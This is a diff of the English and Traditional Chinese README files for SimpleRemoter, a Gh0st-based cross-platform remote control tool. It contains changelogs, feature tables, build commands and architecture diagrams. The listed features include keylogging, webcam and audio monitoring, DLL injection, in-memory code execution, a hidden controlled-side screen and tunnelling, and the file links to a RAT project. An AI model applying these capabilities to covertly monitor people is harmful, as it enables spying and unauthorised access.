- **Multi-user (Go master)**: admin / regular user roles, per-device-group authorization, Challenge-Response login, login rate limiting (per-IP + per-username), opaque tokens
- **Linux client clipboard**: bidirectional clipboard sync via xclip / xsel, supports `text/uri-list` file paths
- **macOS client clipboard**: bidirectional clipboard sync via NSPasteboard, file URLs + legacy API compatibility
**Improvements:**
- Web session adaptive quality is clamped to H264-only levels (≥ Good); Ultra/High (DIFF/RGB565) would otherwise leave the browser unable to decode
- Linux client default `QualityLevel` changed to `QUALITY_GOOD` (matching Windows / macOS) — no longer requests adaptive on the server side
- Login text fields decoded as UTF-8 / GBK depending on client capability bits, fixing mojibake in German / French hostnames and geo locations
- Device list now sorts stably (by online time), no longer reshuffles on every heartbeat / WS push
- RDP reset button wired through to `CMD_RESTORE_CONSOLE` on the device
- MFC master no longer briefly flashes its dialog when a Web session opens (session detection moved to the top of `OnInitDialog`)
**Bug fixes:**
- After closing a Web session from fullscreen, device-list clicks became unresponsive (browser fullscreen subtree rule, now exited centrally in `showPage`)
- When a client crashed, the Web remote desktop page stayed on "Connected" forever (new `device_offline` notification)
- Multi-monitor polling caused two screen sub-connections to push frames simultaneously, making the picture flip between monitors (old sub-conn now retired in `BindScreenConn`)
- Go master `ListDevices` order was randomized by map iteration
### v1.3.3 (2026.5.10)
**Linux/macOS client polish & two-layer authentication**
- Server identity check (Layer 1): Linux/macOS client verifies server identity with HMAC-SHA256
- Sub-connection auth (Layer 2, TOKEN_CONN_AUTH): every sub-connection's first packet is signed and pinned to its clientID
- Linux client: H.264 hardware encoding, XFixes cursor type detection, UTF-8 protocol capability bit
- macOS client: file manager, remote terminal, clipboard sync, daemon mode
- Master: screen preview thumbnails, region screenshot, remote desktop zoom, Web users filter by group
- Shared code factored into `common/` (rtt_estimator / client_auth_state / posix_net_helpers)
### v1.3.2 (2026.5.1)
**macOS client & Web Remote Desktop enhancements**
- Brand-new native macOS client: screen capture, H.264 encoding, mouse/keyboard control
- Web remote desktop cursor sync
- Trigger functionality, user management (role-based permissions)
- DLL execution enhancements, remote desktop input-method switching
### v1.3.1 (2026.4.15) ### v1.3.1 (2026.4.15)
**Web Remote Desktop & Multi-Master Sharing Enhancement** **Web Remote Desktop (MFC master) & multi-master sharing**
**New Features:** - Web remote desktop: WebSocket-based, accessible from phone / tablet browsers
- Web Remote Desktop: WebSocket-based implementation, access remote desktop via mobile/tablet browser ([Configuration Guide](./docs/WebHTTPS.md)) - Multi-monitor: adaptive disabled when multiple monitors are present; expiry date auto-refresh in the status bar
- Revoke sharing menu: Support revoking clients shared to other masters - Multi-layer license auto-update, DLL cache reuse
- Toolbar audio control: Added system audio toggle icon to remote desktop toolbar
**Improvements:**
- Disable adaptive quality for multi-monitor: Auto-disable when client has multiple monitors
- Status bar auto-refresh expiration date: Immediate refresh after license renewal
- Reduce invalid offline logs: Less logging when client not in host list
- Multi-layer authorization auto-update: Layer-2+ master authorizations sync automatically
- Enhanced usage tips: Added more operation hints for better UX
- DLL cache reuse: Save DLL to registry for reuse on next startup
**Bug Fixes:**
- Fixed keylogger may not work properly while sharing client to other master
### v1.3.0 (2026.4.8) ### v1.3.0 (2026.4.8)
**Multi-Tier FRP Architecture & UI Branding** **Multi-tier FRP & brand customization**
**New Features:** - Local FRPS server, multi-tier auto FRP integration
- Local FRPS server support (64-bit only): Built-in FRP server for simplified deployment - V2 license sub-master connection cap, license file import / export
- Multi-tier architecture automatic FRP integration: Downstream masters auto-acquire upstream FRP config - Enhanced hardware ID (V2), UI brand customization
- V2 authorization downstream connection limit: Control concurrent connections for downstream - Configurable runtime feature limits
- License file import/export support (.lic format)
- Expired authorization renewal support: No need to regenerate license
- Enhanced hardware ID (V2): Fix VPS duplicate SN issue
- MaxDepth control: Limit hierarchical master depth level
- License management enhancements: Quota support, dynamic dialog, delete functionality
- IP geolocation API multi-provider fallback: Improved location success rate
- UI branding customization: Support custom program name, logo, copyright, etc.
- Runtime feature limits: Configurable trial version restrictions
- Input history dropdown: Quick selection of previous inputs
- Client generation new options: More customization settings
- Dynamic project links: Change help/feedback URLs without recompiling
**Bug Fixes:** ### Earlier versions
- Fixed Use-after-free crash in RebuildFilteredIndices
- Fixed IOCP race condition crash in CLock::Lock (#215)
- Fixed crash protection service cleanup and agent elevation issue
- Fixed potential crash from unlimited message log growth
- Fixed UpperHash string length issue after FeatureFlags introduction
- Fixed client SN generation to support HWIDVersion setting
**Improvements:** The v1.2.x series (email notifications, remote audio via Opus, V2 license protocol, V2 file transfer, modern Web terminal with xterm.js, remote desktop toolbar rewrite, adaptive quality control, first Linux client, …) and the full evolution since 2019 are documented in [history.md](./history.md).
- Restructured res/ directory with menu icons
- Expired passwords no longer auto-cleared
- Maintain stable connection between downstream and Layer-1 master
### v1.0.2.9 (2026.3.27)
**Network Security & Stability Enhancement**
**New Features:**
- Network configuration dialog: IP whitelist/blacklist management, takes effect immediately
- Configurable rate limiting: DLL request limiting, adjustable IP ban thresholds
- IP history dialog: View license IP login history
- Status bar displays MTBF/runtime and license expiration date
- Agent crash protection: Auto-switch to normal mode after 3 crashes within 5 minutes
- Client search function: Ctrl+F to quickly search IP, location, computer name
- Auto-ban malicious IPs: Auto-ban for 1 hour if >15 connections within 60 seconds
- Proxy Protocol v2 support: Get real client IP behind FRP proxy
- Linux clipboard sync and V2 file transfer support
- Right-click menu to run client program on host
- Multi-layer authorization obfuscation support
**Bug Fixes:**
- Fixed race condition crash in OnUserOfflineMsg
- Fixed FrpcParam lost when client requests FRPC DLL
- Increased max packet size from 10MB to 50MB
- Support mstsc remote session for reading user registry
- Fixed clipboard false trigger when remote desktop minimized
- Fixed master crash when operating process dialog
- Status bar host count updates in real-time
- Reset timeval before each select() call on Linux
- Passcode format validation to filter garbage data
**Improvements:**
- Enhanced authorization check with IP ban notifications
- Support master program running with user privilege
- Large DLL auto-fallback to TinyRun
### v1.2.8 (2026.3.11)
**Email Notification & Remote Audio**
- Host online email notification (SMTP config, keyword matching, right-click quick add)
- Remote audio playback (WASAPI Loopback) + Opus compression (24:1)
- Multiple FRPS servers simultaneous connection support
- Custom cursor display and tracking
- V2 authorization protocol (ECDSA signature)
- Fixed garbled text on non-Chinese Windows systems
- Linux client screen compression algorithm optimization
### v1.2.7 (2026.2.28)
**V2 File Transfer Protocol**
- Support C2C (client-to-client) direct transfer
- Resumable transfer and large file support (>4GB)
- SHA-256 file integrity verification
- WebView2 + xterm.js modern terminal
- Linux file management support
- Host list batch update optimization, reduced UI flickering
### v1.2.6 (2026.2.16)
**Remote Desktop Toolbar Rewrite**
- Status window showing RTT, FPS, resolution
- Fullscreen toolbar supports 4 positions and multi-monitor
- H.264 bandwidth optimization
- License management UI improvements
### v1.2.5 (2026.2.11)
**Adaptive Quality Control & Linux Client**
- RTT-based intelligent quality adjustment
- RGB565 algorithm (50% bandwidth savings)
- Scroll detection optimization (50-80% bandwidth savings)
- Linux client initial release
For complete update history, see: [history.md](./history.md)
--- ---
## Related Projects ## Related Projects
- [HoldingHands](https://github.com/yuanyuanxiang/HoldingHands) - Full English interface remote control - [HoldingHands](https://github.com/yuanyuanxiang/HoldingHands) English-only remote control
- [BGW RAT](https://github.com/yuanyuanxiang/BGW_RAT) - Big Grey Wolf 9.5 - [Gh0st](https://github.com/yuanyuanxiang/Gh0st) — Classic Gh0st implementation
- [Gh0st](https://github.com/yuanyuanxiang/Gh0st) - Classic Gh0st implementation
--- ---
## Contact ## Contact
| Channel | Link | | Channel | Link |
|---------|------| |---|---|
| **QQ** | 962914132 | | **QQ** | 962914132 |
| **Telegram** | [@doge_grandfather](https://t.me/doge_grandfather) | | **Telegram** | [@doge_grandfather](https://t.me/doge_grandfather) |
| **Email** | [yuanyuanxiang163@gmail.com](mailto:yuanyuanxiang163@gmail.com) | | **Email** | [yuanyuanxiang163@gmail.com](mailto:yuanyuanxiang163@gmail.com) |
| **LinkedIn** | [wishyuanqi](https://www.linkedin.com/in/wishyuanqi) | | **Issues** | [Report a bug](https://t.me/SimpleRemoter) |
| **Issues** | [Report Issues](https://t.me/SimpleRemoter) |
| **PR** | [Contribute](https://git.simpleremoter.com/) | | **PR** | [Contribute](https://git.simpleremoter.com/) |
### Sponsorship ### Sponsor
This project originated from technical learning and personal interest. The author will update irregularly based on spare time. If this project has been helpful to you, please consider sponsoring: This project is a side-of-the-desk effort driven by technical curiosity. The author updates it in spare time. If it helps you, sponsorship is welcome:
[![Sponsor](https://img.shields.io/badge/Sponsor-Support%20This%20Project-ff69b4?style=for-the-badge)](https://github.com/yuanyuanxiang/yuanyuanxiang/blob/main/images/QR_Codes.jpg) [![Sponsor](https://img.shields.io/badge/Sponsor-Support%20This%20Project-ff69b4?style=for-the-badge)](https://github.com/yuanyuanxiang/yuanyuanxiang/blob/main/images/QR_Codes.jpg)

782
ReadMe_TW.md
View File

@@ -9,18 +9,18 @@
<a href="https://github.com/yuanyuanxiang/SimpleRemoter/network/members"> <a href="https://github.com/yuanyuanxiang/SimpleRemoter/network/members">
<img src="https://img.shields.io/github/forks/yuanyuanxiang/SimpleRemoter?style=flat-square&logo=github" alt="GitHub Forks"> <img src="https://img.shields.io/github/forks/yuanyuanxiang/SimpleRemoter?style=flat-square&logo=github" alt="GitHub Forks">
</a> </a>
<a href="https://github.com/yuanyuanxiang/SimpleRemoter/releases"> <a href="https://git.simpleremoter.com/yuanyuanxiang/SimpleRemoter/releases">
<img src="https://img.shields.io/github/v/release/yuanyuanxiang/SimpleRemoter?style=flat-square" alt="GitHub Release"> <img src="https://img.shields.io/gitea/v/release/yuanyuanxiang/SimpleRemoter?gitea_url=https%3A%2F%2Fgit.simpleremoter.com&style=flat-square&logo=gitea" alt="Gitea Release">
</a> </a>
<img src="https://img.shields.io/badge/platform-Windows%20%7C%20Linux%20%7C%20macOS-blue?style=flat-square" alt="Platform"> <img src="https://img.shields.io/badge/client-Windows%20%7C%20Linux%20%7C%20macOS-blue?style=flat-square" alt="Client Platforms">
<img src="https://img.shields.io/badge/language-C%2B%2B17-orange?style=flat-square&logo=cplusplus" alt="Language"> <img src="https://img.shields.io/badge/server-Windows%20%7C%20Linux%20%7C%20macOS-success?style=flat-square" alt="Server Platforms">
<img src="https://img.shields.io/badge/IDE-VS2019%2B-purple?style=flat-square&logo=visualstudio" alt="IDE"> <img src="https://img.shields.io/badge/language-C%2B%2B17%20%2F%20Go-orange?style=flat-square&logo=cplusplus" alt="Language">
<img src="https://img.shields.io/badge/license-MIT-green?style=flat-square" alt="License"> <img src="https://img.shields.io/badge/license-MIT-green?style=flat-square" alt="License">
</p> </p>
<p align="center"> <p align="center">
<a href="https://github.com/yuanyuanxiang/SimpleRemoter/releases/latest"> <a href="https://git.simpleremoter.com/yuanyuanxiang/SimpleRemoter/releases/latest">
<img src="https://img.shields.io/badge/Download-最新版本-2ea44f?style=for-the-badge&logo=github" alt="Download Latest"> <img src="https://img.shields.io/badge/Download-最新版本-2ea44f?style=for-the-badge&logo=gitea" alt="Download Latest">
</a> </a>
</p> </p>
@@ -29,10 +29,7 @@
> [!WARNING] > [!WARNING]
> **重要法律聲明** > **重要法律聲明**
> >
> 本軟**僅供教育目的及授權使用場景**,包括: > 本軟**僅供教育目的及授權使用情境**:組織內遠端 IT 管理、經授權的滲透測試與安全研究、個人裝置管理與技術學習。
> - 在您的組織內進行遠端 IT 管理
> - 經授權的滲透測試和安全研究
> - 個人設備管理和技術學習
> >
> **未經授權存取電腦系統屬違法行為。** 使用者須對遵守所有適用法律承擔全部責任。開發者對任何濫用行為概不負責。 > **未經授權存取電腦系統屬違法行為。** 使用者須對遵守所有適用法律承擔全部責任。開發者對任何濫用行為概不負責。
@@ -41,12 +38,13 @@
## 目錄 ## 目錄
- [專案簡介](#專案簡介) - [專案簡介](#專案簡介)
- [免責聲明](#免責聲明) - [本版本亮點:全平台閉環](#本版本亮點全平台閉環)
- [合規與反濫用](#合規與反濫用)
- [功能特性](#功能特性) - [功能特性](#功能特性)
- [技術亮點](#技術亮點) - [全平台支援](#全平台支援)
- [系統架構](#系統架構) - [系統架構](#系統架構)
- [快速開始](#快速開始) - [快速開始](#快速開始)
- [用戶端支援](#用戶端支援) - [使用者文件](#使用者文件)
- [更新日誌](#更新日誌) - [更新日誌](#更新日誌)
- [相關專案](#相關專案) - [相關專案](#相關專案)
- [聯絡方式](#聯絡方式) - [聯絡方式](#聯絡方式)
@@ -55,25 +53,9 @@
## 專案簡介 ## 專案簡介
**SimpleRemoter** 是一個功能完整的遠端控制解決方案,基於經典的 Gh0st 框架重構,採用現代 C++17 開發。專案始於 2019 年,經過持續迭代已發展為支援 **Windows + Linux + macOS** 三平台的企業級遠端管理工具 **SimpleRemoter** 是一個端到端跨平台的遠端控制解決方案。
### 核心能力 專案核心基於經典 **Gh0st 架構**,最早始於 2019 年 1 月。歷經 7 年持續迭代——從 IOCP 通訊核心重構、x264 視訊級編碼、V2 檔案傳輸協定、多層授權體系,到 Linux 與 macOS 用戶端的引入——本版本最終完成**用戶端 + 伺服端的全平台閉環**三大桌面作業系統Windows / Linux / macOS在任一側都可作為受控端或主控端。
| 類別 | 功能 |
|------|------|
| **遠端桌面** | 即時螢幕控制、多顯示器支援、H.264 編碼、自適應品質 |
| **檔案管理** | 雙向傳輸、斷點續傳、C2C 傳輸、SHA-256 校驗 |
| **終端管理** | 互動式 Shell、ConPTY/PTY 支援、現代 Web 終端 |
| **系統管理** | 程序/服務/視窗管理、登錄檔瀏覽、工作階段控制 |
| **媒體擷取** | 網路攝影機監控、音訊監聽、鍵盤記錄 |
| **網路功能** | SOCKS 代理、FRP 穿透、埠映射 |
### 適用場景
- **企業 IT 運維**:批次管理內網設備,遠端故障排查
- **遠端辦公**:安全存取辦公電腦,檔案同步傳輸
- **安全研究**:滲透測試、紅隊演練、安全稽核
- **技術學習**網路程式設計、IOCP 模型、加密傳輸實踐
**原始來源:** [zibility/Remote](https://github.com/zibility/Remote) | **起始日期:** 2019.1.1 **原始來源:** [zibility/Remote](https://github.com/zibility/Remote) | **起始日期:** 2019.1.1
@@ -81,36 +63,73 @@
--- ---
## 免責聲明 ## 本版本亮點:全平台閉環
**請在使用本軟件前仔細閱讀以下聲明:** 本專案長期以 **C++ MFC 主控**`YAMA.exe`)為核心交付形態——經典 Gh0st 架構、IOCP 高效能核心、完整的遠端桌面 / 檔案 / 程序 / 媒體功能堆疊、多層授權體系、品牌客製化——**至今仍是主要使用的主控**。MFC 主控內建了基於 WebSocket 的 Web 遠端桌面服務,從 v1.3.1 起就已經支援**任意平台的瀏覽器**遠控被管裝置(手機 / 平板 / Linux / macOS 桌面均可)。
1. **合法用途**:本專案僅供合法的技術研究、學習交流和授權的遠端管理使用。嚴禁將本軟件用於未經授權存取他人電腦系統、竊取資料、監控他人隱私等任何違法行為 本版本v1.3.4)補上了最後一塊拼圖——**Go 主控**:一個**功能簡潔、聚焦於「遠端桌面 + 遠端終端 + 多使用者分級」** 的輕量伺服端,跨 Windows / Linux / macOS 編譯執行。它的定位**不是取代 MFC**,而是為那些**不方便執行 Windows VPS** 的使用者提供原生的 Linux / macOS 主控落腳點——例如純 Linux 伺服器、ARM Mac 長駐、嵌入式主控盒等情境
2. **使用者責任**:使用者必須遵守所在國家/地區的法律法規。因使用本軟件而產生的任何法律責任,由使用者自行承擔。 ### 兩種主控形態如何選擇
3. **無擔保聲明**:本軟件按「現狀」提供,不附帶任何明示或暗示的擔保,包括但不限於適銷性、特定用途適用性的擔保。 | 形態 | GUI | 功能覆蓋 | 平台 | 定位 |
|---|---|---|---|---|
| **C++ MFC 主控** (`YAMA.exe`) | 原生 Windows GUI + 內建 Web 服務 | ✅ **全部功能** | Windows | **主推方案**。日常運維、檔案管理、媒體擷取、多層授權、品牌客製化等都用它 |
| **Go 主控**(新) | Web UI任何瀏覽器 | 遠端桌面 + 遠端終端 + 多使用者 | Windows / Linux / macOS | **補充方案**。需要「零 Windows 依賴」的純 Linux / macOS 主控部署 |
4. **免責條款**:開發者不對因使用、誤用或無法使用本軟件而造成的任何直接、間接、偶然、特殊或後果性損害承擔責任。 > [!TIP]
> 兩種主控**使用同一套用戶端**——可以混搭,例如一台 Windows MFC 主控 + 一台 Linux Go 主控並行管理同一批裝置群。
5. **版權聲明**:本專案採用 MIT 協議開源,允許自由使用、修改和分發,但必須保留原始版權聲明。 ### Go 主控的核心能力v1.3.4 新增)
**繼續使用本軟件即表示您已閱讀、理解並同意上述所有條款。** - **遠端桌面**H.264 流透過 WebSocket 直接推送瀏覽器WebCodecs 硬體解碼1080P @ 20fps 流暢
- **遠端終端**xterm.js + ConPTY/PTY支援調整尺寸、Tab 自動補全
- **多使用者體系**:管理員 / 一般使用者分級、Challenge-Response 登入、不透明 token、按裝置群授權
- **生產部署**Nginx 反向代理 + Let's Encrypt + Keyboard Lock + 全螢幕控制,防止 ESC / F11 誤退出
- **刻意保持輕量**:不包含檔案管理、媒體擷取、登錄檔、服務管理等 MFC 主控專屬功能——這些請走 MFC 主控
### 全平台支援矩陣
| | **用戶端 (受控端)** | **主控端** |
|---|---|---|
| **Windows** | ✅ 完整功能 | ✅ MFC `YAMA.exe`(推薦)/ Go |
| **Linux** (X11) | ✅ 螢幕 + 終端 + 檔案 + 剪貼簿 | ✅ Go |
| **macOS** (Intel + Apple Silicon) | ✅ 螢幕 + 終端 + 檔案 + 剪貼簿 | ✅ Go |
---
## 合規與反濫用
本專案長期堅持「明確的合規姿態」立場。本版本進一步收緊反濫用邊界。
### 內建技術措施
原始碼層面構築多道獨立可驗證的反濫用屏障,詳見 [反濫用技術措施清單](./docs/Compliance_TechnicalMeasures.md)
- **入站連線 IP 區段校驗**:試用版若被部署到公網會觸發可見告警 latch
- **監聽埠數量上限**:試用版限制 ≤ 2 個監聽埠,防多租戶中轉改造
- **應用層 RTT 反代理**LAN 內 RTT 閾值偵測,反向代理 / 隧道會被識別
- **多層授權架構**V2 ECDSA 離線 + V1 連線 + 試用版分級,每一層限制獨立
- **Web 主控驗證**:強制 Challenge-Response 登入、登入限流、不透明 token、操作可稽核
### 合規文件
| 文件 | 內容 |
|---|---|
| 📖 [反濫用與合規使用政策](./docs/Compliance_AntiAbuse.md) | 完整的發行方-使用方責任劃分 |
| 📖 [反濫用技術措施清單](./docs/Compliance_TechnicalMeasures.md) | 每一道屏障的原始碼位置、設計動機、已知侷限 |
> [!IMPORTANT] > [!IMPORTANT]
> **網路連線與隱私聲明** > **使用本軟體即視為您已閱讀、理解並接受上述合規文件全部條款。** 如您不能或不願接受任一條款,請立即停止使用並銷毀本軟體副本。
>
> 主控程式(伺服器端)會根據授權狀態與授權伺服器進行網路通訊: ### 網路連線與隱私
>
> | 版本類型 | 連線行為 | | 版本類型 | 連線行為 |
> |---------|---------| |---|---|
> | 試用版本 | 維持與授權伺服器的持續連線 | | 試用版本 | 維持與授權伺服器的持續連線 |
> | V1/V2 授權版本 | 啟動時連線驗證,通過後斷 | | V1/V2 授權版本 | 啟動時連線驗證,通過後斷 |
> | V2 離線授權版本 | 無需連線授權伺服器 | | V2 離線授權版本 | 無需連線授權伺服器 |
>
> 除獲得離線授權外,主控程式會與授權伺服器進行必要的資料互(如偵測破解行為、驗證授權有效性)。 除獲得離線授權外,主控程式會與授權伺服器進行必要的資料互(如偵測破解行為、驗證授權有效性)。
>
> **使用本軟體即表示您接受主控程式與授權伺服器之間的資料傳輸。如您不同意,請勿使用本軟體。**
--- ---
@@ -120,240 +139,149 @@
![遠端桌面](./images/Remote.jpg) ![遠端桌面](./images/Remote.jpg)
- **多種截圖方式**GDI相容性強、DXGI高效能、虛擬桌面背景執行 - **多種螢幕擷取**GDI / DXGI / 虛擬桌面Windows、X11 + XShmLinux、CGDisplayStreammacOS
- **智慧壓縮演算法** - **智慧壓縮**DIFF 差分SSE2 最佳化)/ RGB565節省 50% 頻寬)/ **H.264**視訊級壓縮x264 + VideoToolbox + WebCodecs/ 灰階模式
- DIFF 差分演算法 - SSE2 優化,僅傳輸變化區域 - **自適應品質**:根據 RTT 自動調節影格率5-30 FPS、解析度、壓縮演算法
- RGB565 演算法 - 節省 50% 頻寬 - **多顯示器**:多螢幕切換 + 多螢幕上牆
- H.264 編碼 - 視訊級壓縮,適合高幀率場景 - **跨裝置檔案拖曳**Ctrl+C/V 跨裝置複製貼上檔案
- 灰階模式 - 極低頻寬消耗 - **Web 遠端桌面**:瀏覽器直接存取,手機 / 平板可用([設定指南](./docs/WebHTTPS.md)
- **自適應品質**:根據網路 RTT 自動調整幀率5-30 FPS、解析度和壓縮演算法
- **多顯示器**:支援多螢幕切換和多螢幕牆顯示 ![Web遠端桌面](./images/WebRemote.png)
- **隱私螢幕**:被控端螢幕可隱藏,支援鎖定畫面狀態下控制
- **檔案拖放**Ctrl+C/V 跨設備複製貼上檔案
- **Web 遠端桌面**:透過瀏覽器存取遠端桌面,支援手機/平板([設定指南](./docs/WebHTTPS.md)
### 檔案管理 ### 檔案管理
![檔案管理](./images/FileManage.jpg) ![檔案管理](./images/FileManage.jpg)
- **V2 傳輸協定**全新設計,支援大檔案(>4GB - **V2 傳輸協定**支援 >4GB 大檔、斷點續傳、SHA-256 校驗
- **斷點續傳**:網路中斷後自動恢復,狀態持久化
- **C2C 傳輸**:用戶端之間直接傳輸,無需經過主控 - **C2C 傳輸**:用戶端之間直接傳輸,無需經過主控
- **完整性校驗**SHA-256 雜湊驗證,確保檔案完整 - **批次操作**:搜尋、壓縮、批次傳輸
- **批次操作**:支援檔案搜尋、壓縮、批次傳輸
### 終端管理 ### 終端管理
![終端管理](./images/Console.jpg) ![終端管理](./images/LinuxClient.png)
- **互動式 Shell**完整的命令列體驗,支援 Tab 補全 - **互動式 Shell**Tab 自動補全、ANSI escape、調整尺寸
- **ConPTY 技術**Windows 10+ 原生虛擬終端支援 - **現代終端**Windows ConPTY、Linux / macOS PTY
- **現代 Web 終端**基於 WebView2 + xterm.jsv1.2.7+ - **Web 終端**xterm.js + WebSocket與原生體驗一致
- **終端尺寸調整**:自適應視窗大小
### 程序與視窗管理
| 程序管理 | 視窗管理 |
|---------|---------|
| ![程序](./images/Process.jpg) | ![視窗](./images/Window.jpg) |
- **程序管理**檢視程序清單、CPU/記憶體佔用、啟動/終止程序
- **程式碼注入**:向目標程序注入 DLL需系統管理員權限
- **視窗控制**:最大化/最小化/隱藏/關閉視窗
### 媒體功能
| 視訊管理 | 音訊管理 |
|---------|---------|
| ![視訊](./images/Video.jpg) | ![音訊](./images/Voice.jpg) |
- **網路攝影機監控**:即時視訊串流,支援解析度調整
- **音訊監聽**:遠端聲音擷取,支援雙向語音
- **鍵盤記錄**:線上/離線記錄模式
### 其他功能 ### 其他功能
- **服務管理**:檢視和控制 Windows 服務 | 模組 | 能力 |
- **登錄檔瀏覽**:唯讀方式瀏覽登錄檔內容 |---|---|
- **工作階段控制**:遠端登出/關機/重新啟動 | **程序管理** | 程序清單、CPU / 記憶體佔用、終止、DLL 注入 |
- **SOCKS 代理**:透過用戶端建立代理通道 | **視窗管理** | 最大化 / 最小化 / 隱藏 / 關閉 |
- **FRP 穿透**:內建 FRP 支援,輕鬆穿透內網 | **媒體擷取** | 網路攝影機、雙向語音、鍵盤記錄 |
- **程式碼執行**:遠端執行 DLL支援熱更新 | **系統控制** | 服務管理、登錄檔、工作階段登出 / 關機 |
| **網路功能** | SOCKS 代理、FRP 穿透、埠映射 |
| **程式碼執行** | 遠端執行 DLL、記憶體載入、熱更新 |
--- ---
## 技術亮點 ## 全平台支援
### 高效能網路架構 ### Windows 用戶端
``` **系統需求**Windows 7 SP1 及以上
┌─────────────────────────────────────────────────────────┐ **功能完整性**:✅ 全部功能支援
│ IOCP 通訊模型 │
├─────────────────────────────────────────────────────────┤
│ • I/O 完成埠Windows 最高效的非同步 I/O 模型 │
│ • 單主控支援 10,000+ 並行連線 │
│ • 支援 TCP / UDP / KCP 三種傳輸協定 │
│ • 自動分塊處理大資料封包(最大 128KB 傳送緩衝) │
└─────────────────────────────────────────────────────────┘
```
### 自適應品質控制 ### Linux 用戶端v1.2.5+
基於 RTTRound-Trip Time的智慧品質調整系統 **系統需求**
- 顯示伺服器X11/Xorg暫不支援 Wayland
- 必需函式庫libX11推薦函式庫libXtstXTest 擴充、libXss閒置偵測
| RTT 延遲 | 品質等級 | 幀率 | 解析度 | 壓縮演算法 | 適用場景 | | 功能 | 狀態 | 實作 |
|---------|---------|------|--------|-----------|---------| |---|---|---|
| < 30ms | Ultra | 25 FPS | 原始 | DIFF | 區域網路辦公 | | 遠端桌面 | ✅ | X11 螢幕擷取 + libx264 H.264 硬體編碼 |
| 30-80ms | High | 20 FPS | 原始 | RGB565 | 一般辦公 | | 遠端終端 | ✅ | PTY 互動式 Shell |
| 80-150ms | Good | 20 FPS | ≤1080p | H.264 | 跨網/視訊 | | 檔案管理 | ✅ | V2 協定、雙向傳輸、大檔 |
| 150-250ms | Medium | 15 FPS | ≤900p | H.264 | 跨網辦公 | | 程序管理 | ✅ | 清單 + 終止 |
| 250-400ms | Low | 12 FPS | ≤720p | H.264 | 較差網路 | | 剪貼簿同步 | ✅ | xclip / xsel 外部工具,支援檔案 URI |
| > 400ms | Minimal | 8 FPS | ≤540p | H.264 | 極差網路 | | 心跳 / RTT | ✅ | RFC 6298 RTT 估算 |
| 常駐程序 | ✅ | 雙 fork 守護化 |
- **零額外開銷**:複用心跳封包計算 RTT **編譯**`cd linux && cmake . && make`
- **快速降級**2 次偵測即觸發,回應網路波動
- **謹慎升級**5 次穩定後才提升品質
- **冷卻機制**:防止頻繁切換
### V2 檔案傳輸協定 ### macOS 用戶端v1.3.2+
```cpp **系統需求**
// 77 位元組協定標頭 + 檔案名稱 + 資料載荷 - macOS 10.15 (Catalina) 及以上
struct FileChunkPacketV2 { - 架構Intel (x64) 和 Apple Silicon (arm64) 通用二進位檔
uint8_t cmd; // COMMAND_SEND_FILE_V2 = 85 - 系統權限:螢幕錄影、輔助功能、完整磁碟存取
uint64_t transferID; // 傳輸工作階段 ID
uint64_t srcClientID; // 來源用戶端 ID (0=主控端)
uint64_t dstClientID; // 目標用戶端 ID (0=主控端, C2C)
uint32_t fileIndex; // 檔案編號 (0-based)
uint32_t totalFiles; // 總檔案數
uint64_t fileSize; // 檔案大小(支援 >4GB
uint64_t offset; // 目前區塊位移
uint64_t dataLength; // 本區塊資料長度
uint64_t nameLength; // 檔案名稱長度
uint16_t flags; // 標誌位元 (FFV2_LAST_CHUNK 等)
uint16_t checksum; // CRC16 校驗(可選)
uint8_t reserved[8]; // 預留擴充
// char filename[nameLength]; // UTF-8 相對路徑
// uint8_t data[dataLength]; // 檔案資料
};
```
**特性** | 功能 | 狀態 | 實作 |
- 大檔案支援uint64_t 突破 4GB 限制) |---|---|---|
- 斷點續傳(狀態持久化到 `%TEMP%\FileTransfer\` | 遠端桌面 | ✅ | CGDisplayStream + VideoToolbox H.264 硬體編碼 |
- SHA-256 完整性校驗 | 鍵鼠控制 | ✅ | CGEvent支援雙擊、拖曳 |
- C2C 直傳(用戶端到用戶端) | 遠端終端 | ✅ | PTY 互動式 Shellzsh/bash |
- V1/V2 協定相容 | 檔案管理 | ✅ | V2 協定、大檔 |
| 程序管理 | ✅ | proc_listpids + 終止 |
| 剪貼簿同步 | ✅ | NSPasteboard支援檔案 URL + NSFilenamesPboardType |
| 常駐模式 | ✅ | `-d` 後台執行、電源管理、閒置偵測 |
### 螢幕傳輸優化 **編譯**`cd macos && ./build.sh`
- **SSE2 指令集**:像素差分計算硬體加速 ### Go 主控v1.3.4+
- **多執行緒並行**:執行緒池分塊處理螢幕資料
- **捲動偵測**:識別捲動場景,減少 50-80% 頻寬
- **H.264 編碼**:基於 x264GOP 控制,視訊級壓縮
### 安全機制 **系統需求**Go 1.21+(僅編譯時);二進位執行無依賴
| 層級 | 措施 | | 能力 | 實作 |
|------|------| |---|---|
| **傳輸加密** | AES-256 資料加密,可設定 IV | | 遠端桌面 | H.264 → WebSocket → WebCodecs1080P @ 20fps |
| **身分驗證** | 簽章驗證 + HMAC 認證 | | 遠端終端 | xterm.js + PTY/ConPTY 透明轉發 |
| **授權控制** | 序號綁定IP/網域),多級授權 | | 多使用者 | Challenge-Response + 不透明 token + 按群授權 |
| **檔案校驗** | SHA-256 完整性驗證 | | 部署 | Nginx 反向代理 / Let's Encrypt / systemd unit / `/etc/environment` |
| **工作階段隔離** | Session 0 獨立處理 |
### 相依套件 **編譯**`cd server/go && go build -o server_linux_amd64 ./cmd`
| 套件 | 版本 | 用途 |
|------|------|------|
| zlib | 1.3.1 | 通用壓縮 |
| zstd | 1.5.7 | 高速壓縮 |
| x264 | 0.164 | H.264 編碼 |
| libyuv | 190 | YUV 轉換 |
| HPSocket | 6.0.3 | 網路 I/O |
| jsoncpp | 1.9.6 | JSON 解析 |
--- ---
## 系統架構 ## 系統架構
### 全平台拓撲
``` ```
┌───────────────────────────────────────────────────────────────────────────── ┌────────────────────────────────────────────────────────┐
多層授權架構 (Multi-Layer Authorization) 主控層
├─────────────────────────────────────────────────────────────────────────────┤ │ │
┌──────────────────┐ ┌──────────────────┐
┌─────────────────────┐ C++ MFC 主控 Go 主控 │
超級管理員 │ YAMA.exe (Win/Linux/Mac) │
│ (授權伺服器) │ │ Windows only │ │ Web UI 全平台 │
│ Super Admin │ └────────┬─────────┘ └────────┬─────────┘
│ └─────────┬───────────┘ │ └────────────┼──────────────────────────┼─────────────────┘
│ │
┌──────────────┼──────────────┐ │ │ TCP (自訂二進位協定) │ TCP (裝置) + WS (瀏覽器)
│ V2 授權 │ V2 授權 │ V2 授權 │ └────────┬─────────────────┘
│ (ECDSA) │ (ECDSA) │ (ECDSA)
▼ ▼ ▼ │ ┌──────────────┼──────────────┐
┌───────────┐ ┌───────────┐ ┌───────────┐
